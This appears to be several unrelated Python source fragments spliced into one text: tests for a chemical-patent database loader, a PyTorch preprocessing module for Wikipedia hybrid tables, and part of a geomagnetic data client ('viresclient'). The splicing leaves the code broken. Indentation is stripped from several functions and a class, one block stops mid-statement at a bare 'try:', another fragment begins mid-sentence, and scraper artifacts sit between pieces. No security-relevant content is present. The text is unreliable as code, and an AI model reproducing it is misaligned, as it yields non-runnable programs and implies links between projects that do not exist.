        chem_table = self.metadata.tables['schembl_chemical']
        struct_table = self.metadata.tables['schembl_chemical_structure']
        # join chemical properties with their structure text, ordered by chem id
        s = select( [chem_table, struct_table] )\
            .where( chem_table.c.id == struct_table.c.schembl_chem_id )\
            .order_by( chem_table.c.id )
        rows = self.db.execute(s).fetchall()
        self.failUnlessEqual( 19, len(rows) )
        self.check_chem_row( rows[0], (48, 94.111, 2930353, 0, 0, 1.67, 1, 1, 1, 0) )
        self.check_chem_row( rows[2], (1645, 146.188, 1077470, 1, 0, -3.215, 3, 4, 0, 5) )
        self.check_chem_row( rows[8], (3001, 206.281, 275677, 1, 1, 3.844, 1, 2, 1, 4) )
        self.check_struct_row( rows[0], (48, 'OC1=CC=CC=C1', 'InChI=1S/C6H6O/c7-6-4-2-1-3-5-6/h1-5,7H', 'ISWSIDIOOBJBQZ-UHFFFAOYSA-N') )
        self.check_struct_row( rows[2], (1645, 'NCCCCC(N)C(O)=O', 'InChI=1S/C6H14N2O2/c7-4-2-1-3-5(8)6(9)10/h5H,1-4,7-8H2,(H,9,10)', 'KDXKERNSBIXSRK-UHFFFAOYSA-N') )
        self.check_struct_row( rows[8], (3001, 'CC(C)CC1=CC=C(C=C1)C(C)C(O)=O', 'InChI=1S/C13H18O2/c1-9(2)8-11-4-6-12(7-5-11)10(3)13(14)15/h4-7,9-10H,8H2,1-3H3,(H,14,15)', 'HEFNNWSXXWATRW-UHFFFAOYSA-N') )
def test_mapping_loaded(self):
self.load(['data/biblio_single_row.json','data/chem_single_row_nohdr.tsv'])
rows = self.query_all(['schembl_document_chemistry']).fetchall()
exp_rows = [ (DocumentField.TITLE,11), (DocumentField.ABSTRACT,9), (DocumentField.CLAIMS,7), (DocumentField.DESCRIPTION,5), (DocumentField.IMAGES,3), (DocumentField.ATTACHMENTS,1)]
for expected, actual in zip(exp_rows, rows):
self.check_mapping_row( actual, (1, 9724) + expected )
    def test_many_mappings(self):
        """Mappings for many documents/chemicals load with the expected field counts."""
        self.load(['data/biblio_typical.json','data/chem_typical.tsv'])
        # (doc id, chem id, title, abstract, claims, description, images, attachments)
        expected_data = [ (1,9724,0,0,0,1,0,0), (1,23780,0,0,0,11,0,0),(1,23781,0,0,0,11,0,0),(1,25640,0,0,2,4,0,0),
                          (6,61749,0,0,0,1,0,0), (6,1645,11,22,33,44,55,66), (6,15396,0,0,0,4,0,0),
                          (9,48,0,0,0,2,0,0),
                          (10,48,0,0,0,2,0,0),
                          (11,48,0,0,0,2,0,0),
                          (12,48,0,0,0,2,0,0),
                          (13,48,0,0,0,2,0,0),
                          (16,1102,0,0,0,1,0,0),
                          (18,1645,11,22,33,44,55,66),
                          (20,1646,0,0,0,2,0,0),(20,2156,0,0,3,6,0,0), (20,2157,0,0,3,6,0,0), (20,2761,0,0,0,1,0,0), (20,2799,0,0,0,3,0,0), (20,3001,0,0,0,3,0,0), (20,3046,0,0,0,3,0,0), (20,3233,0,0,0,3,0,0), (20,3234,0,0,0,3,0,0), (20,3689,0,0,0,2,0,0)]
        self.verify_chem_mappings(expected_data)
def test_malformed_files(self):
self.expect_runtime_error('data/chem_bad_header.tsv', "Malformed header detected in chemical data file")
self.expect_runtime_error('data/chem_wrong_columns.tsv', "Incorrect number of columns detected in chemical data file")
    def test_duplicate_mappings(self):
        """Duplicate document-chemical mappings in the input collapse to single rows."""
        self.load(['data/biblio_typical.json','data/chem_dup_mappings.tsv'])
        expected_data = [ (20,1646,0,0,0,2,0,0),
                          (1,9724,0,0,0,1,0,0),
                          (1,23780,0,0,0,11,0,0),
                          (1,23781,0,0,0,11,0,0),
                          (18,1645,11,22,33,44,55,66)]
        self.verify_chem_mappings(expected_data)
    def test_replacement_mappings(self):
        """In overwrite mode, re-loading replaces a document's mapping set entirely."""
        updating_loader = self.prepare_updatable_db(True)
        self.load(['data/biblio_typical_update.json','data/chem_typical_update.tsv'], loader=updating_loader)
        self.verify_chem_mappings([ (1,48,36,35,34,33,32,31),               # New
                                    (1,23780,901,902,903,904,905,906),      # Updated
                                    (1,10101010101,41,42,43,44,45,46) ], doc=1) # New
        # Note that 9724, 23781, and 25640 are gone
        self.verify_chemicals(
            { 10101010101: (459.45, 2930353, 0,0, 1.67, 1,1,1,0,
                u"C[C@@H]1[C@H]2[C@H](O)[C@H]3[C@H](N(C)C)C(=C(C(=O)N)C(=O)[C@@]3(O)C(=C2C(=O)c4c(O)c(N)ccc14)O)O",
                u"InChI=1S/C22H25N3O8/c1-6-7-4-5-8(23)15(26)10(7)16(27)11-9(6)17(28)13-14(25(2)3)18(29)12(21(24)32)20(31)22(13,33)19(11)30/h4-6,9,13-14,17,26,28-30,33H,23H2,1-3H3,(H2,24,32)/t6-,9+,13+,14-,17-,22-/m0/s1",
                u"USMLMJGLDDOVEI-PLYBKPSTSA-N") } )
    def test_update_mappings(self):
        """With update_mappings=True existing rows are kept; new/changed rows are merged in."""
        updating_loader = self.prepare_updatable_db(False)
        self.load(['data/biblio_typical_update.json','data/chem_typical_update.tsv'], preload_docs=True, update_mappings=True, loader=updating_loader)
        self.verify_chem_mappings([ (1,48,36,35,34,33,32,31),               # New
                                    (1,9724,0,0,0,1,0,0),                   # Untouched
                                    (1,23780,901,902,903,904,905,906),      # Updated
                                    (1,23781,0,0,0,11,0,0),                 # Untouched
                                    (1,25640,0,0,2,4,0,0),                  # Untouched
                                    (1,10101010101,41,42,43,44,45,46) ], doc=1) # New
        self.verify_chemicals(
            { 10101010101: (459.45, 2930353, 0,0, 1.67, 1,1,1,0,
                u"C[C@@H]1[C@H]2[C@H](O)[C@H]3[C@H](N(C)C)C(=C(C(=O)N)C(=O)[C@@]3(O)C(=C2C(=O)c4c(O)c(N)ccc14)O)O",
                u"InChI=1S/C22H25N3O8/c1-6-7-4-5-8(23)15(26)10(7)16(27)11-9(6)17(28)13-14(25(2)3)18(29)12(21(24)32)20(31)22(13,33)19(11)30/h4-6,9,13-14,17,26,28-30,33H,23H2,1-3H3,(H2,24,32)/t6-,9+,13+,14-,17-,22-/m0/s1",
                u"USMLMJGLDDOVEI-PLYBKPSTSA-N") } )
def prepare_updatable_db(self, overwrite_mode):
updating_loader = DataLoader( self.db, self.test_classifications, overwrite=overwrite_mode )
# | |  (corrupted file-separator artifact; commented out so it does not break parsing)
# <gh_stars>10-100  (scraper metadata artifact; commented out so it does not break parsing)
from torch.utils.data import Dataset, DataLoader, Subset
from torch.utils.data.dataloader import default_collate
from torch.utils.data.sampler import Sampler
import torch
import torch.nn as nn
import torch.nn.functional as F
from base import BaseDataLoader
import pickle
import numpy as np
import json
import os
from tqdm import tqdm
from torch._six import container_abcs, string_classes, int_classes, FileNotFoundError
import re
import random
import copy
import itertools
import math
from multiprocessing import Pool
from functools import partial
import pdb
from model.transformers import BertTokenizer
def mask_tokens(inputs, tokenizer, mlm_probability=0.15):
    """Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.

    Mutates ``inputs`` in place and returns ``(inputs, labels)`` where labels
    are -1 at every position that was not selected for masking.
    """
    labels = inputs.clone()

    # Sample positions to mask with probability ``mlm_probability``; padding
    # positions (pad_token_id) are never selected.
    probability_matrix = torch.full(labels.shape, mlm_probability)
    padding_positions = labels.eq(tokenizer.pad_token_id)
    probability_matrix.masked_fill_(padding_positions, value=0.0)
    masked_indices = torch.bernoulli(probability_matrix).bool()
    labels[~masked_indices] = -1  # loss is computed on masked positions only

    # 80% of masked positions: replace with the [MASK] token id
    indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
    inputs[indices_replaced] = tokenizer.convert_tokens_to_ids(tokenizer.mask_token)

    # 10% of masked positions (half of the remaining 20%): a random vocabulary token
    indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
    random_words = torch.randint(len(tokenizer), labels.shape, dtype=torch.long)
    inputs[indices_random] = random_words[indices_random]

    # the final 10% keep their original token, so nothing left to do
    return inputs, labels
# Entity-vocabulary ids reserved for special markers. Real entity ids start at
# len(RESERVED_ENT_VOCAB); code elsewhere compares against that bound to tell
# reserved markers from genuine entities.
RESERVED_ENT_VOCAB = {0:{'wiki_id':'[PAD]'},
                      1:{'wiki_id':'[ENT_MASK]'},
                      2:{'wiki_id':'[PG_ENT_MASK]'},
                      3:{'wiki_id':'[CORE_ENT_MASK]'}
                      }
RESERVED_ENT_VOCAB_NUM = len(RESERVED_ENT_VOCAB)
def process_single_hybrid_table(input_table, config):
    """Convert one raw hybrid (text + entity) table into model-ready arrays.

    Builds the token sequence (metadata + headers), the entity sequence
    (with prepended pgEnt and [CORE_ENT_MASK] slots), token<->entity
    visibility masks, local entity ids and — in training mode — an
    exclusive-entity mask for same-column prediction.

    Returns a list of numpy arrays/lists consumed by the collate function.
    """
    table_id,subject,pgEnt,pgTitle,secTitle,caption,headers,core_entities,core_entities_text,all_entities,entities,entities_text,entity_cand = input_table
    # textual metadata: page title + section title (+ caption when distinct)
    tokenized_pgTitle = config.tokenizer.encode(pgTitle, max_length=config.max_title_length, add_special_tokens=False)
    tokenized_meta = tokenized_pgTitle+\
        config.tokenizer.encode(secTitle, max_length=config.max_title_length, add_special_tokens=False)
    if caption != secTitle:
        tokenized_meta += config.tokenizer.encode(caption, max_length=config.max_title_length, add_special_tokens=False)
    tokenized_headers = [config.tokenizer.encode(z, max_length=config.max_header_length, add_special_tokens=False) for _,z in headers]
    input_tok = []
    input_tok_pos = []
    input_tok_type = []
    tokenized_meta_length = len(tokenized_meta)
    input_tok += tokenized_meta
    input_tok_pos += list(range(tokenized_meta_length))
    input_tok_type += [0]*tokenized_meta_length  # token type 0 = metadata
    tokenized_headers_length = [len(z) for z in tokenized_headers]
    input_tok += list(itertools.chain(*tokenized_headers))
    input_tok_pos += list(itertools.chain(*[list(range(z)) for z in tokenized_headers_length]))
    input_tok_type += [1]*sum(tokenized_headers_length)  # token type 1 = header
    input_ent = []
    input_ent_text = []
    input_ent_type = []
    column_en_map = {}  # column index -> positions of its entities in input_ent
    row_en_map = {}     # row index    -> positions of its entities in input_ent
    core_entity_mask = []
    for e_i, (index, entity) in enumerate(entities):
        input_ent.append(entity)
        if len(entities_text[e_i])!=0:
            input_ent_text.append(config.tokenizer.encode(entities_text[e_i], max_length=config.max_cell_length, add_special_tokens=False))
        else:
            input_ent_text.append([])
        # entity type 3 = subject-column ("core") entity, 4 = other cell entity
        input_ent_type.append(3 if index[1]==subject else 4)
        core_entity_mask.append(1 if index[1]==subject else 0)
        if index[1] not in column_en_map:
            column_en_map[index[1]] = [e_i]
        else:
            column_en_map[index[1]].append(e_i)
        if index[0] not in row_en_map:
            row_en_map[index[0]] = [e_i]
        else:
            row_en_map[index[0]].append(e_i)
    input_length = len(input_tok) + len(input_ent)
    assert len(input_tok) < config.max_input_tok
    assert len(input_ent) < config.max_input_ent
    meta_and_headers_length = tokenized_meta_length+sum(tokenized_headers_length)
    assert len(input_tok) == meta_and_headers_length
    #create input mask
    # tokens can always attend to each other
    tok_tok_mask = np.ones([len(input_tok), len(input_tok)], dtype=int)
    # at train time metadata tokens see all entities; at eval time they do not
    if config.src == "train":
        meta_ent_mask = np.ones([tokenized_meta_length, len(input_ent)], dtype=int)
    else:
        meta_ent_mask = np.zeros([tokenized_meta_length, len(input_ent)], dtype=int)
    header_ent_mask = np.zeros([sum(tokenized_headers_length), len(input_ent)], dtype=int)
    start_i = 0
    # header_span maps column index -> (start, end) token offsets of its header
    header_span = {}
    for h_i, (h_j, _) in enumerate(headers):
        header_span[h_j] = (start_i, start_i+tokenized_headers_length[h_i])
        start_i += tokenized_headers_length[h_i]
    # header tokens attend to the entities located in the same column
    for e_i, (index, _) in enumerate(entities):
        header_ent_mask[header_span[index[1]][0]:header_span[index[1]][1], e_i] = 1
    ent_header_mask = np.transpose(header_ent_mask)
    if config.src != "train":
        # at eval time headers must not see entities (only the reverse direction)
        header_ent_mask = np.zeros([sum(tokenized_headers_length), len(input_ent)], dtype=int)
    input_tok_mask = [tok_tok_mask, np.concatenate([meta_ent_mask, header_ent_mask], axis=0)]
    # entities always see the metadata tokens
    ent_meta_mask = np.ones([len(input_ent), tokenized_meta_length], dtype=int)
    ent_ent_mask = np.eye(len(input_ent), dtype=int)
    # entities in the same column may attend to each other (at eval time, only
    # to earlier, non-reserved entities — presumably to avoid leaking targets)
    for _,e_is in column_en_map.items():
        for e_i_1 in e_is:
            for e_i_2 in e_is:
                if config.src=="train" or (e_i_2<e_i_1 and input_ent[e_i_2]>=len(RESERVED_ENT_VOCAB)):
                    ent_ent_mask[e_i_1, e_i_2] = 1
    # same for entities sharing a row
    for _,e_is in row_en_map.items():
        for e_i_1 in e_is:
            for e_i_2 in e_is:
                if config.src=="train" or (e_i_2<e_i_1 and input_ent[e_i_2]>=len(RESERVED_ENT_VOCAB)):
                    ent_ent_mask[e_i_1, e_i_2] = 1
    input_ent_mask = [np.concatenate([ent_meta_mask, ent_header_mask], axis=1), ent_ent_mask]
    # prepend [CORE_ENT_MASK] to input, input_ent[1] = [CORE_ENT_MASK]
    input_tok_mask[1] = np.concatenate([np.zeros([len(input_tok), 1], dtype=int),input_tok_mask[1]],axis=1)
    input_ent = [config.entity_wikid2id['[CORE_ENT_MASK]']] + input_ent
    input_ent_text = [[]] + input_ent_text
    input_ent_type = [3] + input_ent_type
    # prepend pgEnt to input_ent, input_ent[0] = pgEnt
    if pgEnt!=-1:
        input_tok_mask[1] = np.concatenate([np.ones([len(input_tok), 1], dtype=int),input_tok_mask[1]],axis=1)
    else:
        input_tok_mask[1] = np.concatenate([np.zeros([len(input_tok), 1], dtype=int),input_tok_mask[1]],axis=1)
    input_ent = [pgEnt if pgEnt!=-1 else 0] + input_ent
    input_ent_text = [tokenized_pgTitle[:config.max_cell_length]] + input_ent_text
    input_ent_type = [2] + input_ent_type
    # rebuild entity masks with the two prepended slots (rows/cols 0 and 1)
    new_input_ent_mask = [np.ones([len(input_ent), len(input_tok)], dtype=int), np.ones([len(input_ent), len(input_ent)], dtype=int)]
    new_input_ent_mask[0][2:, :] = input_ent_mask[0]
    new_input_ent_mask[1][2:, 2:] = input_ent_mask[1]
    # process [CORE_ENT_MASK] mask: it sees metadata plus the subject header only
    new_input_ent_mask[0][1, tokenized_meta_length:] = 0
    if subject in header_span:
        # assert header_span[0][0] == 0
        new_input_ent_mask[0][1, tokenized_meta_length+header_span[subject][0]:tokenized_meta_length+header_span[subject][1]] = 1
    new_input_ent_mask[1][1, 2:] = 0
    new_input_ent_mask[1][2:, 1] = 0
    if subject in column_en_map:
        new_input_ent_mask[1][1, 2+column_en_map[subject][0]] = 1 # seed=1
    # process pgEnt mask: when there is no page entity, fully mask slot 0
    if pgEnt==-1:
        new_input_ent_mask[1][:, 0] = 0
        new_input_ent_mask[1][0, :] = 0
    input_ent_mask = new_input_ent_mask
    core_entity_mask = [0,1]+core_entity_mask
    if entity_cand is not None:
        # candidates exclude entities already present in the table
        entity_cand = list(set(entity_cand)-all_entities)
    all_entity_set = list(all_entities)
    def find_id(e, e_list):
        # position of entity e within e_list; raises if absent
        for i, e_1 in enumerate(e_list):
            if e == e_1:
                return i
        # pdb.set_trace()
        raise Exception
    if config.src == "train":
        input_ent_local_id = [find_id(pgEnt, all_entity_set) if pgEnt!=-1 else 0,0]+[find_id(e, all_entity_set) for e in input_ent[2:]]
        exclusive_ent_mask = np.full([len(input_ent), max([len(z) for _,z in column_en_map.items()])-1], 1000) # mask entity in the same column for prediction
        for e_i, (index, _) in enumerate(entities):
            tmp_j = 0
            for e_i_0 in column_en_map[index[1]]:
                if input_ent_local_id[2+e_i_0] != input_ent_local_id[2+e_i]:
                    exclusive_ent_mask[2+e_i,tmp_j] = input_ent_local_id[2+e_i_0]
                    tmp_j += 1
    else:
        input_ent_local_id = [find_id(pgEnt, all_entity_set) if pgEnt!=-1 else 0,0]
        i = 2
        # at eval time reserved-marker slots borrow the local id of the entity
        # that follows them — NOTE(review): assumes markers always precede a
        # real entity; confirm against the eval data layout.
        while i < len(input_ent):
            if input_ent[i]>=len(RESERVED_ENT_VOCAB):
                e = input_ent[i]
                input_ent_local_id.append(find_id(e, all_entity_set))
                i+=1
            else:
                e = input_ent[i+1]
                tmp_e = find_id(e, all_entity_set)
                input_ent_local_id += [tmp_e, tmp_e]
                i+=2
        exclusive_ent_mask = None
    if len(core_entities) > 1:
        core_ent_local_id = [find_id(e, all_entity_set) for e in core_entities[1:]]
    else:
        core_ent_local_id = []
    # pad per-entity cell text to a rectangular array (length >= 1 per cell)
    input_ent_cell_length = [len(x) if len(x)!=0 else 1 for x in input_ent_text]
    max_cell_length = max(input_ent_cell_length)
    input_ent_text_padded = np.zeros([len(input_ent_text), max_cell_length], dtype=int)
    for i,x in enumerate(input_ent_text):
        input_ent_text_padded[i, :len(x)] = x
    return [table_id,np.array(input_tok),np.array(input_tok_type),np.array(input_tok_pos),(np.array(input_tok_mask[0]),np.array(input_tok_mask[1])),len(input_tok), \
        np.array(input_ent),input_ent_text_padded,input_ent_cell_length,np.array(input_ent_local_id),np.array(input_ent_type),(np.array(input_ent_mask[0]),np.array(input_ent_mask[1])),len(input_ent), \
        np.array(core_entity_mask),core_ent_local_id,all_entity_set,entity_cand,exclusive_ent_mask]
def process_single_hybrid_table_CER(input_table, config):
    """Convert one hybrid table into model-ready arrays for core-entity retrieval (CER).

    Returns the same 12-element list layout as the rest of the pipeline:
    [table_id, tokens, token types, token positions, token count,
     entities, padded entity text, entity text lengths, entity count,
     local ids of entities within core_entities, core entities, candidates].
    """
    (table_id, subject, pgEnt, pgTitle, secTitle, caption, headers,
     core_entities, core_entities_text, all_entities,
     entities, entities_text, entity_cand) = input_table
    encode = config.tokenizer.encode
    tokenized_pgTitle = encode(pgTitle, max_length=config.max_title_length, add_special_tokens=False)
    tokenized_meta = tokenized_pgTitle + encode(secTitle, max_length=config.max_title_length, add_special_tokens=False)
    if caption != secTitle:
        # only append the caption when it is not just a repeat of the section title
        tokenized_meta = tokenized_meta + encode(caption, max_length=config.max_title_length, add_special_tokens=False)
    tokenized_header = encode(headers[0][1], max_length=config.max_header_length, add_special_tokens=False)
    # Token stream: page/section metadata (segment 0) followed by the first
    # header (segment 1); positions restart for each segment.
    input_tok = list(tokenized_meta) + list(tokenized_header)
    input_tok_pos = list(range(len(tokenized_meta))) + list(range(len(tokenized_header)))
    input_tok_type = [0] * len(tokenized_meta) + [1] * len(tokenized_header)
    input_ent = [entity for _, entity in entities]
    input_ent_text = [
        encode(cell_text, max_length=config.max_cell_length, add_special_tokens=False) if cell_text else []
        for cell_text in entities_text
    ]
    def _position_of(target, seq):
        # Linear-scan index lookup; mirrors list.index but raises a bare
        # Exception (as the surrounding pipeline expects) when missing.
        for pos, candidate in enumerate(seq):
            if candidate == target:
                return pos
        raise Exception
    # Local id (position within core_entities) for every table entity.
    input_ent_local_id = [_position_of(e, core_entities) for e in input_ent]
    # Prepend the two special entities: [0] = page entity, [1] = [CORE_ENT_MASK].
    input_ent = [pgEnt if pgEnt != -1 else 0, config.entity_wikid2id['[CORE_ENT_MASK]']] + input_ent
    input_ent_text = [tokenized_pgTitle[:config.max_cell_length], []] + input_ent_text
    input_ent_cell_length = [len(toks) if toks else 1 for toks in input_ent_text]
    padded_width = max(input_ent_cell_length)
    input_ent_text_padded = np.zeros([len(input_ent_text), padded_width], dtype=int)
    for row, toks in enumerate(input_ent_text):
        input_ent_text_padded[row, :len(toks)] = toks
    return [table_id, np.array(input_tok), np.array(input_tok_type), np.array(input_tok_pos), len(input_tok), \
            np.array(input_ent), input_ent_text_padded, input_ent_cell_length, len(input_ent), np.array(input_ent_local_id), np.array(core_entities), \
            entity_cand]
class WikiHybridTableDataset(Dataset):
def _preprocess(self, data_dir):
if self.mode == 0:
preprocessed_filename = os.path.join(
data_dir, "procressed_hybrid", self.src
)
elif self.mode == 1:
preprocessed_filename = os.path.join(
data_dir, "procressed_hybrid_CER", self.src
)
elif self.mode == 2:
preprocessed_filename = os.path.join(
data_dir, "procressed_hybrid_all", self.src
)
else:
raise Exception
preprocessed_filename += ".pickle"
if not self.force_new and os.path.exists(preprocessed_filename):
print("try loading preprocessed data from %s" % preprocessed_filename)
with open(preprocessed_filename, "rb") as f:
return pickle.load(f)
else:
print("try creating preprocessed data in %s" % preprocessed_filename)
try:
if self.mode == 0:
os.mkdir(os.path.join(data_dir, "procressed_hybrid"))
elif self.mode == 1:
os.mkdir(os.path.join(data_dir, "procressed_hybrid_CER"))
elif self.mode == 2:
os.mkdir(os.path.join(data_dir, "procressed_hybrid_all"))
else:
raise Exception
except FileExistsError:
pass
origin_data = open(os.path.join(data_dir, self.src + "_tables.jsonl"), "r")
entity_candidate_file = os.path.join(data_dir, self.src + ".entity_candidate.pkl")
if os.path.exists(entity_candidate_file):
with open(entity_candidate_file, "rb") as f:
entity_candidate = pickle.load(f)
else:
entity_candidate = None
print("Pre-processing data...")
origin_table_num = 0
actual_tables = []
table_removed = 0
for table in tqdm(origin_data):
origin_table_num += 1
table = json.loads(table.strip())
table_id = table.get("_id","")
pgTitle = table.get("pgTitle", "").lower()
pgEnt = table.get("pgId", -1)
if entity_candidate is not None:
entity_cand = entity_candidate.get(table_id, [])
entity_cand = [self.entity_wikid2id[z] for z in entity_cand if z in self.entity_wikid2id]
else:
entity_cand = None
if pgEnt != -1:
try:
pgEnt = self.entity_wikid2id[pgEnt]
except:
pgEnt = -1
secTitle = table.get("sectionTitle", "").lower()
caption = table.get("tableCaption", "").lower()
headers = table.get("processed_tableHeaders", [])
rows = table.get("tableData", {})
subject = table.get("subject_column", 0)
entity_columns = table.get("entityColumn", [])
headers = [[j, headers[j]] for j in entity_columns]
entity_cells = np.array(table.get("entityCell",[[]]))
core_entities = []
core_entities_text = []
all_entities = set()
if pgEnt!=-1:
all_entities.add(pgEnt)
num_rows = len(rows)
num_columns = len(rows[0])
entities = []
entities_text= []
split = [0]
tmp_entity_num = 0
for i in range(num_rows):
tmp_entities = []
tmp_entities_text = []
for j in range(num_columns):
if j in entity_columns:
if self.mode == 1 and j!=subject:
continue
if entity_cells[i,j] == 1:
try:
| |
the "SiteCode"/"IAGA_code" identifier
ds2 = ds2.set_index({"Site": codevar})
ds2 = ds2.rename({"Site": codevar})
return ds2
def make_pandas_DataFrame_from_csv(csv_filename):
    """Load a csv file into a pandas.DataFrame

    Set the Timestamp as a datetime index.

    Args:
        csv_filename (str)

    Returns:
        pandas.DataFrame

    Raises:
        Exception: if the file cannot be parsed as csv
    """
    try:
        df = pandas.read_csv(csv_filename)
    except Exception as err:
        # Preserve the underlying parser error as the cause for debugging
        raise Exception("Bad or empty csv.") from err
    # Convert to datetime objects
    df['Timestamp'] = df['Timestamp'].apply(
        time_util.parse_datetime)
    # Returns empty dataframe when retrieval from server is empty
    if len(df) != 0:
        # Convert the columns of vectors from strings to lists
        # (cells are serialised like "{1.0;2.0;3.0}")
        for col in df:
            first = df[col].iloc[0]
            # isinstance + startswith: also safe for empty-string cells,
            # which previously raised IndexError on [0][0]
            if isinstance(first, str) and first.startswith('{'):
                df[col] = df[col].apply(
                    lambda x: [
                        float(y) for y in x.strip('{}').split(';')
                    ])
    df.set_index('Timestamp', inplace=True)
    return df
class ReturnedDataFile(object):
    """For handling individual files returned from the server.
    Holds the data returned from the server and the data type.
    Data is held in a NamedTemporaryFile, which is automatically closed and
    destroyed when it goes out of scope.
    Provides output to different file types and data objects.
    """
    def __init__(self, filetype=None, tmpdir=None):
        """Create the backing temporary file.

        Args:
            filetype (str): one of ("csv", "cdf", "nc")
            tmpdir (str): directory in which to create the tempfile

        Raises:
            Exception: if tmpdir does not exist
            TypeError: if filetype is invalid (raised by the setter)
        """
        self._supported_filetypes = ("csv", "cdf", "nc")
        self.filetype = str() if filetype is None else filetype
        if tmpdir is not None:
            if not os.path.exists(tmpdir):
                raise Exception("tmpdir does not exist")
        if os.name == "nt":
            # Windows cannot reopen an already-open NamedTemporaryFile, so
            # close it immediately and remove it manually at interpreter exit.
            self._file = tempfile.NamedTemporaryFile(
                prefix="vires_", dir=tmpdir, delete=False)
            self._file.close()
            atexit.register(os.remove, self._file.name)
        else:
            self._file = tempfile.NamedTemporaryFile(
                prefix="vires_", dir=tmpdir)
    def __str__(self):
        return "viresclient ReturnedDataFile object of type " + \
            self.filetype + \
            "\nSave it to a file with .to_file('filename')" + \
            "\nLoad it as a pandas dataframe with .as_dataframe()" + \
            "\nLoad it as an xarray dataset with .as_xarray()"
    def open_cdf(self):
        """Returns the opened file as cdflib.CDF
        """
        return FileReader._open_cdf(self._file.name)
    def _write_new_data(self, data):
        """Replace the tempfile contents with 'data' (bytes)

        Raises:
            TypeError: if data is not bytes
        """
        if not isinstance(data, bytes):
            raise TypeError("data must be of type bytes")
        # If on Windows, the file will be closed so needs to be re-opened:
        with open(self._file.name, "wb") as temp_file:
            temp_file.write(data)
    def _write_file(self, filename):
        """Write the tempfile out to a regular file
        """
        with open(self._file.name, "rb") as temp_file:
            with open(filename, 'wb') as out_file:
                shutil.copyfileobj(temp_file, out_file)
    @property
    def filetype(self):
        """Filetype is one of ("csv", "cdf", "nc")
        """
        return self._filetype
    @filetype.setter
    def filetype(self, value):
        if not isinstance(value, str):
            raise TypeError("filetype must be a string")
        value = value.lower()
        if value not in self._supported_filetypes:
            raise TypeError("Chosen filetype must be one of: {}".format(
                self._supported_filetypes
            ))
        self._filetype = value
    @staticmethod
    def _check_outfile(path, path_extension, overwrite=False):
        """Check validity of path and extension, and if it exists already

        Raises:
            TypeError: if path is not a string or has the wrong extension
            Exception: if the file exists and overwrite is False
        """
        if not isinstance(path, str):
            raise TypeError("path must be a string")
        if path.split('.')[-1].lower() != path_extension:
            raise TypeError("Filename extension should be {}".format(
                path_extension
            ))
        if os.path.isfile(path) and not overwrite:
            raise Exception(
                "File not written as it already exists and overwrite=False"
            )
    def to_file(self, path, overwrite=False):
        """Saves the data to the specified file.
        Only write to file if it does not yet exist, or if overwrite=True.
        Currently handles CSV and CDF formats.
        Args:
            path (str): path to the file to save as
            overwrite (bool): Will overwrite existing file if True
        """
        self._check_outfile(path, self.filetype, overwrite)
        self._write_file(path)
        print("Data written to", path)
    def to_netcdf(self, path, overwrite=False):
        """Saves the data as a netCDF4 file (this is compatible with HDF5)
        Extension should be .nc
        """
        self._check_outfile(path, 'nc', overwrite)
        # Convert to xarray Dataset
        ds = self.as_xarray()
        ds.to_netcdf(path)
        print("Data written to", path)
    def as_dataframe(self, expand=False):
        """Convert the data to a pandas DataFrame.

        Note:
            Not supported for "nc" data.

        Returns:
            pandas.DataFrame
        """
        if self.filetype == 'csv':
            if expand:
                raise NotImplementedError
            df = make_pandas_DataFrame_from_csv(self._file.name)
        elif self.filetype == 'cdf':
            with FileReader(self._file) as f:
                df = f.as_pandas_dataframe(expand=expand)
        else:
            # Bug fix: the "nc" filetype previously fell through and raised
            # UnboundLocalError on `df`; fail with a clear message instead.
            raise NotImplementedError(
                "{} to dataframe is not supported".format(self.filetype))
        return df
    def as_xarray(self, group=None, reshape=False):
        """Convert the data to an xarray Dataset.
        Note:
            Does not support csv
            Only supports scalar and 3D vectors (currently)
        Returns:
            xarray.Dataset
        """
        if self.filetype == 'csv':
            raise NotImplementedError("csv to xarray is not supported")
        elif self.filetype == 'cdf':
            with FileReader(self._file) as f:
                ds = f.as_xarray_dataset(reshape=reshape)
        elif self.filetype == 'nc':
            ds = xarray.open_dataset(self._file.name, group=group)
        # Record provenance on the returned dataset
        ds.attrs["Sources"] = self.sources
        return ds
    @property
    def sources(self):
        # List of source product identifiers, read from the file header
        with FileReader(self._file) as f:
            sources = f.sources
        return sources
    @property
    def magnetic_models(self):
        # List of magnetic model identifiers, read from the file header
        with FileReader(self._file) as f:
            magnetic_models = f.magnetic_models
        return magnetic_models
    @property
    def range_filters(self):
        # List of range filters applied, read from the file header
        with FileReader(self._file) as f:
            range_filters = f.range_filters
        return range_filters
class ReturnedData(object):
"""Flexible object for working with data returned from the server
Holds a list of ReturnedDataFile objects under self.contents
Example usage::
...
data = request.get_between(..., ...)
data.sources
data.range_filters
data.magnetic_models
data.as_xarray()
data.as_dataframe(expand=True)
data.to_file()
"""
    def __init__(self, filetype=None, N=1, tmpdir=None):
        """Create N ReturnedDataFile parts of the given filetype.

        Args:
            filetype (str): one of ("csv", "cdf", "nc")
            N (int): number of file parts to hold
            tmpdir (str): directory for the backing tempfiles
        """
        self.contents = [ReturnedDataFile(filetype=filetype, tmpdir=tmpdir)
                         for i in range(N)]
        # filetype checking / conversion has been done in ReturnedDataFile
        self.filetype = self.contents[0].filetype
def __str__(self):
return "viresclient ReturnedData object of type "+self.filetype +\
"\nSave it to a file with .to_file('filename')" + \
"\nLoad it as a pandas dataframe with .as_dataframe()" + \
"\nLoad it as an xarray dataset with .as_xarray()"
    @property
    def filetype(self):
        """Filetype string, e.g. "csv" / "cdf" / "nc" (set at construction).
        """
        return self._filetype
    @filetype.setter
    def filetype(self, value):
        # Unlike ReturnedDataFile, no whitelist check here: the value has
        # already been validated by the contained ReturnedDataFile objects.
        if not isinstance(value, str):
            raise TypeError("filetype must be a string")
        self._filetype = value
    @property
    def sources(self):
        """ Get list of source product identifiers.

        Union over all file parts, deduplicated and sorted.
        """
        sources = set()
        for item in self._contents:
            sources.update(item.sources)
        return sorted(sources)
    @property
    def magnetic_models(self):
        """ Get list of magnetic models used.

        Union over all file parts, deduplicated and sorted.
        """
        models = set()
        for item in self._contents:
            models.update(item.magnetic_models)
        return sorted(models)
    @property
    def range_filters(self):
        """ Get list of filters applied.

        Union over all file parts, deduplicated and sorted.
        """
        filters = set()
        for item in self._contents:
            filters.update(item.range_filters)
        return sorted(filters)
@property
def contents(self):
"""List of ReturnedDataFile objects
"""
return self._contents
